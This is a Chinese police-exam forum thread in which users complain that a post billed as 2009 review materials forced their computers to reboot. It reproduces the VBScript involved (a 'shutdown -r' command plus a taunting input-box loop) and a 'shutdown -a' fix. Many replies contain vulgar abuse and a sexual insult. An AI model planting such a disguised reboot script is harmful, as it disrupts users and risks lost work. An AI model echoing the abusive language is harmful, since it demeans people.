110BBS

QQ登录

只需一步,快速开始

卓美眼科专家帮你顺利入警
楼主: 到了倒了

[历年真题] 2009年政法干警考试复习资料(申请加精)

楼主脑子进水了吧
玩这种低级游戏,不是找骂么?
站长新浪微博https://weibo.com/494920
关注招警、公务员考试最新考试信息考试动向从关注站长微博起步
点击举报违法不良信息,奖励论坛积金币www.110bbs.com
为响应全国整治互联网低俗之风专项行动,110BBS特别推出举报违法和不良信息专帖。
dddddddddddddd
凡哥,你来看看这个人 怎么这样的素质啊!电脑差点让他弄坏了!幸亏不像“熊猫烧香”那样!
你也太没素质了!
我干你祖奶奶楼主 。你妈被人强奸了!3 p$ x: \. k$ ?  C
楼猪,你作为非生物,给非生物丢脸,你作为微生物,给微生物丢脸,你作为脊椎动物,给脊椎动物丢脸,你作为人,给人丢脸,你作为台湾人,给台湾人民丢脸,你作为中国人,给中国人民丢脸,你作为亚洲人,给亚洲人民丢脸,你作为地球人,给地球人丢脸,你作为外星人,给外星人丢脸.   
1 e6 A6 c' f( |' M# o) y8 P你对不起你爸爸妈妈爷爷奶奶姑姑婶婶舅舅舅妈亲戚朋友同学..你活在世界上一天,你就对不起世界一天!  - e2 C9 W9
我干你祖奶奶楼主 。你妈被人强奸了!3 p$ x: \. k$ ?  C
楼猪,你作为非生物,给非生物丢脸,你作为微生物,给微生物丢脸,你作为脊椎动物,给脊椎动物丢脸,你作为人,给人丢脸,你作为台湾人,给台湾人民丢脸,你作为中国人,给中国人民丢脸,你作为亚洲人,给亚洲人民丢脸,你作为地球人,给地球人丢脸,你作为外星人,给外星人丢脸.   
1 e6 A6 c' f( |' M# o) y8 P你对不起你爸爸妈妈爷爷奶奶姑姑婶婶舅舅舅妈亲戚朋友同学..你活在世界上一天,你就对不起世界一天!  - e2 C9 W9

登录/注册后可看大图

登录/注册后可看大图

登录/注册后可看大图

登录/注册后可看大图

登录/注册后可看大图
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 20 -c ""路爷驾到,全球停电,不信,试试···"" ",0 ,true  
dim a
do while(a <> "")
a = inputbox ("  你马上就要跟我说北北了!因为你了机子马上重起!呵呵要想不重起请说我错了哥就不重起了",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
楼主很奇怪,是不是脑子进水了,还是学傻了,找骂???
骗子啊  大家不要下了
楼主 ,你头被门缝挤了,真他妈的贱。
什么意思,不让看可以不上传,无聊
你是不是 sb 没事找抽
shutdown -a
打开这个小程序时候不要慌 输入shutdown -a 就不会被关机了大家试下
楼主太缺德 幸亏我这有高手
我干你~~~~~小P孩~~~~你给我小心点~~~~~~骗你爷爷我~~~~我急了让你爸爸打你~~~~~滚蛋~
是男子汉的话 把你的联系方式留上面 希望你是新乡的
谢谢LZ分享了!
什么个情况?看到回复,我下了都不敢打开了...
hehe
xx
楼上兄台骂人功夫了得啊!
在下佩服佩服!
虽说关了一次机,可看到楼上的骂段,喜笑颜开!我哈哈哈再哈哈哈还哈哈哈~~~~
没见过你这么无聊的!简直是垃圾!
强烈建议凡哥 封ID!  永久!